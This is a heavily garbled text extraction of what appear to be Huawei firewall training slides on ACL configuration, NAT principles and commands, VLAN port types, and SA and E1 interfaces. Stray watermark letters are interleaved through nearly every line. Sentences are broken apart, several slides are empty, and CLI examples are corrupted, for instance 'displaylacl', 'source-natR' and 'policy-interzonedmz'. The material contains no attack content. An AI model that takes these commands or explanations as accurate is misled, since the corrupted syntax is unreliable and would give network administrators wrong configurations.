e used to create an ACL and enter the ACL view.
The command aclRis
gundo acl is used to delete an ACL.
n
The command
i
n
r
a
Le
r
Pa ge 44
Copyrig
o
n
e
/
n
e
/
m
o
c
ACL Configuration Methods
ACL step
Edit the ACL.
.
i
e
w
a
u
h
.
g
n
i
n
acl 3000
r
a
e 3000
displaylacl
/3000
/
acl
p:
rule deny source 1.1.1.1 0
t
t
h
rule permit tcp destination-port equal www

rule permit ip source 172.16.12.31 0
s:
Acl's step is 5
rule 0 deny source 1.1.1.1 0 logging
rule 3 permit ip source 192.168.10.0 24

e
c
r 24
rule 3 permit ip source 192.168.10.0
rule 5 deny logging
u
o
s
rule 5 deny logging
rule 10 permit ip source 172.16.12.31 0
e
R
g
n
i
n
r
a
Le
r
Pa ge 45
Copyrig
o
acl 3000
n
e
/
m
o
c
ACL Matching Order
.
i
e
w
a
u
h
.
g
Matching order of ACL rules:
n
i
n
config mode: The rules configured first are matched first. In other
r
a
le
words, the smaller the rule SN is, the higher the priority is.
/
/
: the priority is.
p
smaller the address range is, the
higher
t
t
h
Matching order of various
: ACLs
s
e
c
ACLs based on MACraddresses > Advanced ACLs > Basic ACLs
u
o
sof ACLs of the same type
e
Matching order
R
g
n
The smaller
the ACL-number is, the higher the priority is.
i
n
r
a
e
L
r
Pa ge 46
Copyrig
o
auto mode: The matching rule is depth first. In other words, the
n
e
/
Example of Configuring an Interface- om

c
.
i
based ACL (on CLI)
e
w Server
Telnet
FTP Server
a
u192.168.1.2
192.168.1.1
External interface
h
.
g
n
202.38.160.1
192.168.1.5
i
n
r
Internal interface
a
e
l
/
/
:
p
WWW Server
192.168.1.4
t
192.168.1.3 t
h
:
s
e
202.39.2.3
c
rbetween the intranet and extranet
Objectives: To enable access control
u
o 192.168.1.4 in the Trust zone to access the Untrust zone.
1. Allow the host at IP address
s
e
2. Allow the host at IPRaddress 202.39.2.3 in the Untrust zone to access the servers at IP
addresses 192.168.1.1,
g 192.168.1.2, and 192.168.1.3 in the Trust zone.
n
i in Trust and Untrust zones to run the ping command to test communication
3. Allow all hosts
n
with each other
r and they communicate well.
a
Networked devices:
Le PC, firewall, server, router
e
r
o
Pa ge 47
n
e
/
Example of Configuring an Interface- om

c
.
i
based ACL (on Web)
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
e
r
o
Pa ge 48
n
e
/
Example of Configuring an Interzone om

c
.
i
ACL (on CLI)
e
w
a
u
h
.zone
E2/0/0
g
DMZ
Local zone E1/0/0
Untrust
n
192.168.2.1
i
192.168.1.1 n
r
a
e
l
/
/
192.168.1.2
192.168.2.2
:
p
t port
Console
t
h
:
s
e
c
r
u
o
s
e
R
Objective: To enable two devices in the DMZ and Untrust zone of the
g
n
firewall to successfully
ping each other
i
n
r
a
Networked
Le devices: PC, firewall, server
e
r
o
Pa ge 49
n
e
/
Example of Configuring an Interzone om

c
.
i
ACL (on Web)
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
e
r
o
Pa ge 50
n
e
/
m
o
c
Summary
ACL principles
ACL functions and classification
.
i
e
w
a
u
n
i
n
h
.
g
r
a
e
of interface-based
l
/
/
:
packet filtering
p
t
t
h
Application scenarios and configurations of interzone
:
s
e
c
packet filtering
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 51
Copyrig
o
Questions
m
o
c
n
e
/
.
i
e
Whats the relationship among packet filtering, status inspection
w
a
u
mechanism, and session table?
h
.
g
Fragment cache function: What is the difference nbetween
formats of
i
n If the first fragment
the first packet fragment and other fragments?
r
a
e
arrives first, which measure will be carried
l out? If the first fragment
/
/
arrives late, which measure will be taken?
:
p
t
Which are application scenarios h
oft port identification (port mapping)?
: application scenarios of interzone
s
What is the difference between
e
c
r packet filtering?
packet filtering and interface
u
o
s
What is the difference
Re between inbound of interzone packet filtering
g
and inbound ofninterface
packet filtering? What is difference
i
between outbound
of interzone packet filtering and outbound of
n
r
a
interface
packet
filtering?
e
L
r
Pa ge 52
Copyrig
o
n
e
/
m
o
c
Answer
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 53
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
Thank :you
//
p
www.huawei.com
t
t
:
s
e
c
r
u
o
s
n
r
a
e
r
o
Le
g
n
i
Re
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
Chapter 4 Network in
n
r
a
Address Translation
e
l
/
/
:
Technology
tp
:
s
e
c
r
ht
u
o
s
n
r
a
g
n
i
Re
e
L
e
r
o
www.huawei.com
Objectives
n
e
/
.
i
e
w
a
u to:
able
.
g
n
NAT Technical Principles
i
n
r
a
NAT Application Modes
e
l
/
/
Firewall NAT Configuration p:
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 1
Copyrig
o
m
o
c
Contents
n
e
/
.
i
e
m
o
c
w
a
u
1. Introduction to Network Address Translation
h
.
g
Technology
n
i
n
r
a IP Address
2. NAT Technology Based on the Source
e
l
/
/
:
3. NAT Technology Based on the
p Destination IP Address
t
ht
4. Bidirectional NAT Technology
:
s
e
c
r
5. NAT Application Scenario
Configuration
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 2
Copyrig
o
n
e
/
m
o
c
Background Information
w
a
u
The explosive growth of the Internet leads to the depletion of IPv4

addresses.
.
i
e
h
.
g
n
i
The next generation of IP technology, IPv6, cannotnreplace IPv4 addresses in
r
a
a large scale in a short time.
e
l
/
/
With the continuous development of technologies,
various technologies for
:
p
t
extending the IPv4 lifespan emerge continuously.
NAT is one of the most
ht
excellent technical means.
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 3
Copyrig
o
n
e
/
m
o
c
Why NAT is Required?
w
a
u
.
i
e
Using the private network address can implement address reuse and increase IP
resource utilization.
h
.
The private network address cannot be routed over public networks;
g otherwise, it
n
leads to routing problems.
i
n
rof private network addresses
The NAT technology is used to translate a large number
a
e communication services
into a small amount of public network addresses tolensure
/
and save IP address resources.
/
No address
: is
10.1.1.1 is private
p
translation
t
network address.
t
done.
The route is unknown.
h
:
s
Destination
IP
address:123.3.2.3
Communication
e
Source IP address: 10.1.1.1
c
between the
r
u
Discard
o
private network
s
and public network
Re
g
without NAT
FTP Server
IntranetnUser
i
123.3.2.3
10.1.1.1
n
r
a
Le
r
Pa ge 4
Copyrig
o
n
e
/
m
o
c
Basic Principles of NAT Technology
.
i
e
w
The NAT technology is used to translate the source address or the destination
address
a
u access the
in the IP packet header. It enables a large number of private IP addresses
h
. which can effectively
public network by sharing a small amount of public IP addresses,
g
n a large number of
slow down the speed of the IP address space depletion andienable
n
private network users access the Internet.
r
a address
Replace
the private network
e
source
to the public
l
/ network address
/
:
p
t
t
h
:
s
e
c
r
u
o
Intranet User
s
FTP Server
e
10.1.1.1
R
123.3.2.3
g
n
Replace the public network
i
n
destination address to the
r
private network address
a
e
L
r
Pa ge 5
Copyrig
o
Destination IP address:123.3.2.3
Destination IP address: 123.3.2.3

Destination IP address: 123.3.21

Destination IP address: 10.1.1.1
n
e
/
m
o
c
NAT Categories
Based on the Source IP Address Translation Direction
h
.
g
w
a
u
Outbound direction: The data packets are transferred from a high-security network to a low-security network.
n
i
n
Based on Whether the Source IP Address Port is Translated
r
a which does not involve the port
No-PAT mode: It is used for a one-to-one translation of IP addresses,
e
l
translation.
/
/translation of IP addresses, which involves the
NAPT mode: It is used for a many-to-one or many-to-many
:
p
port translation.
t
t
h
Based on the Destination IP Address Translation Function
:
NAT Server function: The private networksserver provides services for public network users by using this
e
function.
c
r NAT can be used for Internet access by mobile phone users. The
u
Destination NAT function: Destination
o
default WAP gateway is not s
consistent with the gateway provided by the local operator.
e
R
Bidirectional NAT
g
NAT Inbound and n
NAT Server are used together.
i
n
Intrazone NAT
and NAT Server are used together.
r
a
e
L
r
Pa ge 6
Copyrig
o
.
i
e
Inbound direction: The data packets are transferred from a low-security network to a high-security network.
n
e
/
m
o
c
NAT Advantages and Disadvantages
.
i
e
w
a
u
h
.
Advantages
g
n
i
n resources.
Allow IP address reuse and save precious address
r
a
e
l
Be transparent to users in the process of/address
translation.
/
:
p
Hide the internal network topology/information
from external users.
t
t
h
Implement load balancing of intranet servers.
:
s
e
c
Disadvantages
r
u
o
Increase difficultieses
in term of network monitoring.
R
g some applications.
Do not support
n
i
n
r
a
Le
r
Pa ge 7
Copyrig
o
Contents
n
e
/
.
i
e
m
o
c
w
a
u
h
.
g
Technology
n
i
n
r
a IP Address
e
l
/
/
:
t
ht
:
s
e
c
r
Configuration
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 9
Copyrig
o
n
e
/
m
Overview of NAT Technology Based on the Source oIP
c
.
Address
i
e
w
a
Conversion Based on the Source IP Address
u
h
.
g
n
ni
Conversion
Source IP address
192.168.0.11
Destination IP
Address 1.1.1.1
Trust
Source IP
address 9.9.9.9
r
a
le
/
/
p:
Untrust
t
t
h
Conversion Based on the Source IP Address
and Port
:
s
e Conversion
c
r
u
o
s
Re
g
n
i
Untrust
Trust
n
r
a
Le
r
Pa ge 10
Copyrig
o
Source IP address
192.168.0.11
Source port X
Destination IP
address 1.1.1.1
Destination IP
address 1.1.1.1
Source IP address
Source port Y
2.2.2.2
Destination IP
address 1.1.1.1
n
e
/
Differences Between NAT Outbound and om

c
.
i
NAT Inbound
e
w
a
u
NAT Outbound
h
.
Outbound
g
n
i
Conversion
n
r
a
e
l
/
/
:
p
Trust
Untrust
t
t
h
NAT Inbound
:
s
e
c
r
u
Conversion
o
s
Re
g
Inbound
n
i
n
r
DMZ
Untrust
a
Le
e
r
o
High-security zone
Source IP address
192.168.0.11
Destination IP
Address 1.1.1.1
Low-security zone
Source IP address
9.9.9.9
High-security zone
Source IP address
192.168.0.11
Destination IP
Address 1.1.1.1
Destination IP
address 1.1.1.1
Low-security zone
Source IP address
9.9.9.9
Pa ge 11
Destination IP
address 1.1.1.1
n
e
/
m
o
One-to-One Address Translation i.c
e
w
a
u
h
.
The address before the conversion is bound with
g the one after
n
i
n
conversion in order to meet some specialr requirements.
a
e
lused.
Therefore, this application is scarcely
/
/
:
p
t
ht
192.168.1.1
: 155.133.87.1
s
e
155.133.87.2
192.168.1.2
c
r
u
155.133.87.3
192.168.1.3so
Re
g
n
i
n
r
a
Le
r
Pa ge 12
Copyrig
o
n
e
/
m
o
c
Many-to-Many Address Translation
.
i
e
w
a
u
h
A segment of address used for conversion can be configured by using the
.address pool. During
g
conversion, the Internet address in the address pool will be selected successively,
and then be
n
i
taken as a intranet address in address translation until all addressnin the address pool are used up.
r
a
In this case, subsequent private addresses cannot be translated.
e
l
/
/
:
p
t
192.168.1.1
155.133.87.1
t
h155.133.87.2
192.168.1.2
:
s
e 155.133.87.3
192.168.1.3
c
r
Discard
u
192.168.1.4
o
s
Many-to-many address translation
Re is on a first-come first-server basis; whereas one-to-one address
translation uses manually
g configured one-to-one address mappings. In many-to-many address
n
i number of public addresses is the same number of private addresses.
translation, the required
n
r
Therefore, many-to-many
address translation is not common either.
a
e
L
r
Pa ge 13
Copyrig
o
n
e
/
m
o
Many-to-One Address Translationi.c
e
w
a
Multiple internal addresses are mapped to different port numbers u
of the same public
h The NAPT
.
address in order to implement the many-to-one address conversion.
g
n
technology is used to implement the many-to-one address i
conversion.
n
r
a
e
l
/
/
7111
192.168.1.1
155.133.87.1
:
p
t
7112
192.168.1.2
155.133.87.1
t
h
192.168.1.3
: 155.133.87.17113
s
ce 4 information to extend Layer-3 addresses. An
NAPT is a technology that usesrLayer
u use. Theoretically, a public address can be mapped to
o
IP address has 65,535 ports
for
s
e
R which effectively enhances address spaces and increase
65535 private addresses,
g Therefore, NAPT is a frequently-used address translation
utilization of IP addresses.
n
i
n
method.
r
a
Le
r
Pa ge 14
Copyrig
o
n
e
/
m
o
c
Configuration Based on Source IP Address

Translation (NAT No-PAT)
Configure the NAT address pool in the system view.
.
i
e
w
a
u
h
.
g
nat address-group group-number [group-name] start-address end-address
Enter the interzone NAT policy view in the system

ni view.
r
a
nat-policy interzone zone-name1 zone-name2e{inbound | outbound}
l
/
Create the NAT policy and enter the policy
ID view.
/
:
p
policy [ policy-id ]
t
t
h
Policy source { source-address source-wildcard |}
:
s
e
Policy destination { source-address
source-wildcard |}
c
r {service-set-name}
u
Policy service service-set
o
s
e
action { source-natR|no-nat}
Address-groupng
{number | name} no-pat
i
n
r
a
e
L
r
Pa ge 15
Copyrig
o
n
e
/
m
Configuration Based on Source IP
o
c
.
Address and Port Conversion (NAPT)ei
w
a
u
h
Configure the NAT address pool in the system view..
g
n
nat address-group group-number [group-name] start-address
end-address
i
n
r
Enter the interzone NAT policy view in the system
view.
a
e
l {inbound | outbound}
nat-policy interzone zone-name1 zone-name2
/
/
:
Create the NAT policy and enter the
ppolicy ID view.
t
ht
:
s
Policy source { source-address
source-wildcard
|}
e
c
r
source-wildcard |}
u
o {service-set-name}
s
Re
action { source-nat
g |no-nat}
n
i {number | name}
Address-group
n
r
a
Le
e
r
o
Pa ge 17
Contents
n
e
/
.
i
e
m
o
c
w
a
u
h
.
g
Technology
n
i
n
r
a IP Address
e
l
/
/
:
t
ht
:
s
e
c
r
Configuration
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 18
Copyrig
o
n
e
/
m
o
c
NAT Server-Internal Server
.
i
e
w
a
u
In the practical application, a Web server is required when the external resource
h
.
g
accesses the internal host. The external host does not have route to point the internal
n
i
n
address; therefore, the internal server cannot be accessed. The NAT Server function
r
a
le
selects a public network address to represent the internal server address.
Source IP
address
Destination IP address
192.168.1.1
Conversion
True address
:
s
e
c
rDMZ
192.168.1.1
WWW server
ou
s
e
R
t
t
h
/
/
p:
Source IP
address
Destination IP address
202.202.1.1
Public network address
202.202.1.1
untrust
Internet users
g
n
i the private network address. For Internet users, the Internet
server to represent
n
r on the firewall is the server address.
address configured
a
Le
r
Pa ge 19
Copyrig
o
On the firewall, a dedicated public network address is configured for the internal
n
e
/
m
o
c
Configuration Based on NAT Server
.
i
e
w
a
u
In the system view:
h
.
g
nat server [ id ] zone zone-name protocol protocol-type
n global {globali
n| interface-type
r
address [ global-port ] | interface {interface-name
a
e
l
interface-number } } inside host-address [ host-port
] [ vrrp virtual-router-id ]
/
/ ]
:
[no-reverse] [ vpn-instance vpn-instance-name
p
t
ht
: based on the destination address. If the
s
NAT Server is a frequently-used
NAT
e
c
r its true IP address is a private network address,
intranet deploys a server u
and
o access this server by using a public network
s
public network users can
e
R
address. In this case, NAT Server can be configured and the device can
g
n
transfer the packet
i that public network users access this public network
n
r intranet server.
address toathe
Le
r
Pa ge 21
Copyrig
o
n
e
/
m
o
c
Destination NAT
.
i
e
w
a
u
h
.
g
n
i
n
Base station
GGSN
/
/
p:
r
a
le
GSR
Firewall
WAP gateway
t
t
h
:
s
e
c
r
gateway address is not consistent
with the WAP gateway address of the
u
o
local operator, a devicescan be deployed between the terminal and the WAP
e
R
gateway in order to configure the NAT function. In this case, the device will
g
n
automatically forward
the packet that is wrongly sent to the WAP gateway
i
n
r terminal to the correct WAP gateway.
address byathe
Le
r
Pa ge 23
Copyrig
o
When the mobile terminal accesses the wireless network, if the default WAP
n
e
/
m
o
c NAT
Configuration Based on Destination
.
i
e
w
a
u
h
acl [ number ] acl-number [ vpn-instance vpn-instance-name g
].
n
i
n
r
aview.
Create the advanced ACL and enter the ACL
e
l { destination-address
/
rule [ rule-id ] { deny | permit } protocol [ destination
/
:
p
destination-wildcard | any | address-set address-set-name
} | destination-port
t
{ operator port1 [ port2 ] | port-set port-set-name
} ..
ht
:
s
e
c
Access the system view:ur

o vpn-instance-name ] [ name ] zone-name
s
firewall zone [ vpn-instance
Re
g
n
i zone view.
Enter the security

n
r
a
destination-nat
Le acl-number address ip-address [ port port-number ]
r
Pa ge 24
Copyrig
o
Contents
n
e
/
.
i
e
m
o
c
w
a
u
h
.
g
Technology
n
i
n
r
a IP Address
e
l
/
/
:
t
ht
:
s
e
c
r
Configuration
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 25
Copyrig
o
n
e
/
m
Overview of Bidirectional NAT
o
c
.
i
Technology
e
w
In the bidirectional NAT application scenario, when the

ua two sides of
h
.
g
communication access the opposite side, the destination
address is
n
i
n
not a true address, but an address after NATrconversion. For
a
e
linbound direction, and
applications such as outbound direction,
/
/
:
internal server, the addresses are translated
based on requirements
p
t
ht
of one side.
:
s
e
The bidirectional NAT hascfollowing
scenarios.
r
u
o NAT inbound are used together.
The internal server and
s
e
R
The internal server
and interzone NAT are used together.
g
n
i
n
r
a
e
L
r
Pa ge 26
Copyrig
o
n
e
/
m
o
c
Interzone Bidirectional NAT

w
a
u
NAT Inbound
private IP address
r
a
e
202.20.1.5
l
/
/
p:
192.168.1.1
192.168.1.5
Internet server
True IP address
:
s
e
c
r
h
.
g
n
i
n
DMZ
t
t
h
.
i
e
Untrust
2.2.2.5
Internet users
Public network
address
u
o
s
To simplify the configuration
of the routing from the server to
e
R
the public network,
the NAT Inbound configuration can be
g
n
i
n
added based
on the NAT Server.
r
a
e
L
r
Pa ge 27
Copyrig
o
Intrazone Bidirectional NAT
n
e
/
.
i
e
m
o
c
w
a
If both sides that need to translate addresses areuin the same
h
.
security zone, the interzone NAT is required.ng
i
n
Server public network address
User publicrnetwork address
a
e
202.202.1.1
202.202.1.5
l
/
Trust domain /
:
p
t
t
h
192.168.1.1
192.168.1.5
:
s
e
c
r
u
Intranet users
Server
o
susers access the intranet server, the NAT conversion by using the
In the intranet, when intranet
e
R conditions. If users access the server by using the domain name,
firewall is required under
certain
g
n
the public network i
address of the server will be used after DNS resolution. In this case, the
n
communication r
between users and the server is implemented via the firewall.
a
Le
r
Pa ge 28
Copyrig
o
n
e
/
m
o
c
Interzone Bidirectional NAT Configuration
.
i
e
w
a
NAT Server Configuration
u
h
nat server [ id ] zone zone-name protocol protocol-type global. {global-address
g
n
[ global-port ] | interface {interface-name | interface-type interface-number
} } inside
i
n
r
host-address [ host-port ] [ vrrp virtual-router-id ] [no-reverse]
[ vpn-instance vpna
e
l
instance-name ]
/
/
:
NAT Inbound Configuration
p
t
nat address-group group-number [group-name]
start-address end-address
ht
:
nat-policy interzone zone-name1 zone-name2
{inbound | outbound}
s
e
c
r
u
Policy source { source-address
o source-wildcard |}
s
source-wildcard |}
Re
g {service-set-name}
n
i |no-nat}
n
action { source-nat
r
a
Address-group
Le {number | name}
r
Pa ge 29
Copyrig
o
Contents
n
e
/
.
i
e
m
o
c
w
a
u
h
.
g
Technology
n
i
n
r
a IP Address
e
l
/
/
:
t
ht
:
s
e
c
r
Configuration
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 30
Copyrig
o
n
e
/
m
o
c
NAT Application Scenario Analysis
.
i
e
Untrust zone
w
a
uScenario Analysis
h
Application
.
g
nOutbound application
NAT
i
n
r
a NAT Server application
e
l
192.168.20.1/24
202.169.10.1/29//
:
p
t
t
h
:
s
e
c
r
u
DMZ
192.168.0.1/24
o
s
Re
g
n
i
n
r
a
Trust zone
Le
r
Pa ge 31
Copyrig
o
n
e
/
Firewall NAT Outbound Configuration om

c
.
i
(Command Line)
e
Roadmap and Examples for Configuring Outbound NAT aw
u
h
.
1. Configure the interzone packet filtering policy
g
n
i
[USG] policy interzone trust untrust outbound
n
r
[USG-policy-interzone-trust-untrust-outbound] policy 0 a
e
l
[USG-policy-interzone-trust-untrust-outbound-0] policy
/ source 192.168.0.0 0.0.0.255
/
: action permit
[USG-policy-interzone-trust-untrust-outbound-0]
p
t
t
2. Configure the address pool
h
: 202.169.10.6
[USG] nat address-group 1 202.169.10.2
s
e policy
c
3. Configure the NAT outbound
r
u
o trust untrust outbound
[USG] nat-policy interzone
s
Re
[USG-nat-policy-interzone-trust-untrust-outbound]
policy 0
g
[USG-nat-policy-interzone-trust-untrust-outbound-0]
policy source 192.168.0.0 0.0.0.255
n
i
n
action source-nat
r
a
e
address-group 1
L
e
r
o
Pa ge 32
n
e
/
m
o
Firewall NAT Outbound Configuration.c(Web)
i
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 34
Copyrig
o
n
e
/
m
Firewall NAT Server Configuration
o
c
.
i
(Command Line)
e
w
a
u
Roadmap and Examples for Configuring the Internal Server
h
.
g
1. Configure the internal Web and FTP server
n
i
n
[USG] nat server protocol tcp global 202.169.10.1 80 inside 192.168.20.2
8080
r
a192.168.20.3 ftp
[USG] nat server protocol tcp global 202.169.10.1 ftp inside
e
l
/
2. Configure the interzone packet filtering rules
/
:
[USG] policy interzone dmz untrust inbound p
t
t
[USG-policy-interzone-dmz -untrust-outbound]
h policy 0
[USG-policy-interzonedmz -untrust-outbound-0]
policy destination 192.168.20.2 0
:
s
e
policy service service-set http
c
r
action permit
u
o-untrust-outbound] policy 1
[USG-policy-interzonedmz
s
[USG-policy-interzoneRedmz -untrust-outbound-1] policy destination 192.168.20.3 0
g
[USG-policy-interzone-dmz
-untrust-outbound-1] policy service service-set ftp
n
i
[USG-policy-interzonedmz -untrust-outbound-1] detect ftp
n
r
[USG-policy-interzonedmz -untrust-outbound-1] action permit
a
e
L
e
r
o
Pa ge 35
n
e
/
Firewall NAT Server Configurationom

c
.
i
(Web)
e
w
.
g
n
i
n
a
u
h
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 37
n
e
/
m
o
c
Summary
.
i
e
w
a
u
h
.
g
NAT Technical Principles
NAT Application Modes
Firewall NAT Configuration
:
s
e
c
r
n
i
n
r
a
le
/
/
p:
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 38
n
e
/
m
o
c
Questions
w
a
u
What is the difference between NAT inbound and NAT outbound?
h
.
g
Why NAT based on the IP address does not have the one-to-many
application scenario?
What limitations does No-PAT have?
What is the application scenario of easy IP?
.
i
e
r
a
le
n
i
n
/
/
p:
What is the meaning of the no-reverse tparameter
in the NAT based on the
destination IP address?
ht
:
What is the difference betweenesNAT server and destination NAT
c
implementation mechanisms?
r
u
o
s
What is the differenceebetween
the interzone bidirectional NAT and
R
interzone bidirectional NAT application scenarios?
g
n
i application scenarios, what are the concerns in the
In different NAT
n
r of interzone packet filtering rules?
a
configuration
Le
r
Pa ge 39
Copyrig
o
n
e
/
m
o
c
Answer
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 40
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
Thank :you
//
p
www.huawei.com
t
t
:
s
e
c
r
u
o
s
n
r
a
e
r
o
Le
g
n
i
Re
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
Chapter 5 Firewall r
a
e
l
/
Networking
:/
:
s
e
c
r
p
t
ht
u
o
s
n
r
a
g
n
i
Re
e
L
e
r
o
www.huawei.com
Objectives
n
e
/
.
i
e
w
a
u to:
able
.
g
n
Basic VLAN technologies
i
n
r
a
SA and E1 WAN interface technologies
e
l
/
/
:
Basic ADSL technologies
p
t
ht
WLAN and 3G wireless technologies
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 1
Copyrig
o
m
o
c
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. VLAN Feature Technology

2. SA and E1 Feature Technology
h
.
g
3. ADSL Feature Technology
n
i
n
r
a
le
/
/
p:
4. WLAN Feature Technologytt
:
5. 3G Feature Technology
s
e
c
r
u
n
r
a
e
r
o
g
n
i
o
s
e
Le
Pa ge 2
n
e
/
m
o
c
VLAN Background Broadcast Storm
.
i
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
Broadcastttdomain
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 3
Copyrig
o
m
o
Dividing Broadcast Domains by VLANs.c
i
e
w
a
u
h
.
Port 1 : VLAN-1
Port 2 : VLAN-2
g
n
i
n
r
a
e
l
/
/
:
p
t
t
Broadcast
Broadcast
h
domain
domain
:
s
e
c
r
u
o
s
e
R
g
n
i
n
r
a
Le
r
Pa ge 4
Copyrig
o
n
e
/
n
e
/
m
o
c
VLAN Frame Format

DA
SA
DA
.
i
e
SA
TYPE
TAG
:
s
e
c
r
DATA
a
e
l frame with IEEE802.1Q tag
Ethernet
/
/
:
TYPE
DATA
CRC
p
t
ht
u
o
s
g
n
i
Re
0x8100
n
r
a
e
r
o
Le
w
a
u Ethernet frame
Standard
h
.
g
CRC
n
i
rn
PRI
C
F
I
TPID
VLAN ID
TCI
Pa ge 5
n
e
/
m
o
Types of Ethernet Switch Ports i.c
e
w
Access port
a
u
h port can belong
.
Generally, the access port is used to connect the user PC. An access
g
n
to only a VLAN.
i
n
r
a
Trunk port
e
l
/ between switches. A trunk port
Generally, the trunk port is used for the connection
/
:send packets from and to multiple
p
can belong to multiple VLANs to receive and
t
t
VLANs.
h
:
s
Hybrid port
e
c
r connection between switches or user PCs. A hybrid
The hybrid port is used for the
u
o VLANs to receive and send packets from and to
s
port can belong to multiple
e
R
multiple VLANs.
g
n
What is the
i
n
function of the
r
a
default ID (PVID)?
e
L
r
Pa ge 6
Copyrig
o
Access-Link Configuration
n
e
/
.
i
e
m
o
c
w
a
u
By default, all the ports of the switch are access ports andhbelong
to VLAN-1.
.
g
That is, the PVID is 1.
n
i
n
r
Configure the portatype:
e
l
port link-type
access
/
/
:
p
Createta VLAN:
Port-0/1 : VLAN3
ht 3
vlan
:
s
Port-0/2 : VLAN3 ce Add a port to the VLAN:
r port ethernet 0/1
u
o
s
Re
Add the VLAN to a port:
g
n
i
port access vlan 3
n
r
a
Le
r
Pa ge 7
Copyrig
o
n
e
/
m
o
c
Trunk-Link Configuration
.
i
e
w
a
u
The trunk port is responsible for transmitting the data of multiple VLANs.
By default, the PVID of the trunk port is 1.
:
s
e
c
r
n
i
n
r
a
Port-0/3 e
l
/
/
:
p
Port-0/3
Configure the port type:
h
.
g
t
t
h
port link-type trunk
u
o
s
Configure the VLANs whose packets can be transmitted
e
R
port trunk
permit vlan all
g
n
i
n the PVID of the trunk port:
Configure
r
eaport trunk pvid 1
over the trunk port:
e
r
o
Pa ge 8
n
e
/
m
o
c
Hybrid-Link Configuration
.
i
e
w
a
u
The hybrid port is responsible for transmitting the data of multiple VLANs.
It can determine whether to strip the tag.
By default, the PVID of the hybrid port is 1.
h
.
g
n
i
n
Port-0/3
r
a
Port-0/3 e
l
/
/
:
p
t
t
h
:
s
ce
port link-type rhybrid
u whose packets can be transmitted
o
Configure the VLANs
s
e
R port and the PVID:
over the hybrid
g
port n
hybrid pvid 1 vlan 10 to 20 tagged
i
n
r
a
Le
Configure the port type:
e
r
o
Pa ge 9
n
e
/
m
o
c
Routers Between VLANs
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
VLAN 100
:
s
e
c
r
u
o
s
g
n
i
Re
t
t
h
VLAN 200
VLAN 300
The packets of different VLANs cannot go across the VLAN boundaries. The
n
r
a
packets must be forwarded by the Layer-3 device from a VLAN to another

VLAN.
e
r
o
Le
Pa ge 10
n
e
/
m
o
c
Contents
.
i
e
w
a
u

h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
u
n
r
a
e
r
o
g
n
i
o
s
e
Le
Pa ge 11
n
e
/
m
o
c
SA Serial Port Overview
.
i
e
w
a
u
The serial port is a common WAN port. The serial port is classified into synchronous
h
.
g
serial port and asynchronous serial port. The synchronous serial port is widely used.
n
i
n
The SA interface is a synchronous serial interface and supports various cables such as
r
a
e which can satisfy the service
peer devices. The maximum bandwidth is 2.048 Mbit/s,
l
/
data transmission requirements of carriers and enterprise
customers.
/
:
p equipment (DTE) and data circuitt
The SA has two work modes, that is, data terminal
t
h
terminal equipment (DCE).
:
s
As the uplink interface, the SA canebear various services such as HTTP and FTP.
c
r
The SA supports various data u
link layer protocols, including Peer-Peer Protocol (PPP)
o
s (HDLC).
and High Level Data LinkeControl
R
The SA supports thegIP network layer protocols.
n
i
n
r
a
e
L
r
Pa ge 12
Copyrig
o
V2.4, V3.5, X.21, RS449, and RS530. It supports various baud rates to satisfy different
n
e
/
m
o (CLI)
SA Serial Port Configuration Example
c
.
i
e
w
a
The SA interface uses the PPP protocol.
u
h
.
g
n
i
n
r
a
e
l
/
/
Configure the USG 2200A:
: protocol to PPP. Set other
p
#Configure the serial1/0/0. Set the encapsulation
t
t
parameters to the default values.
h
:
<USG2200A>system-view
s
e 1/0/0
[USG2200A]interface serial
c
r address 10.110.1.11 255.255.255.0
[USG2200A-serial1/0/0]ip
u
o
s
[USG2200A-serial1/0/0]link-protocol
ppp
e
R
[USG2200A-serial1/0/0]shutdown
g
n
[USG2200A-serial1/0/0]undo
shutdown
i
n configuration is complete, add the serial1/0/0 interface to the
Note: After the
r
a Enable the default interzone packet filtering rules.
security zone.
e
L
r
Pa ge 13
Copyrig
o
n
e
/
m
o
c
What Is E1 Interface?
.
i
e
w
a
u
The E1 is a widely used low-speed WAN physical interface. It works at the

bottom layer of the PDH rate system. It provides various application modes
to support flexible low-speed access modes.
h
.
g
n
i
n
r
a
le
The E1/T1 interface uses the regional standards. The E1 interface complies
with the ITU-T standards and is applicable to Europe and China. The T1 (also
called J1) interface complies with the ANSI standard and is applicable to
North America and Japan.
/
/
p:
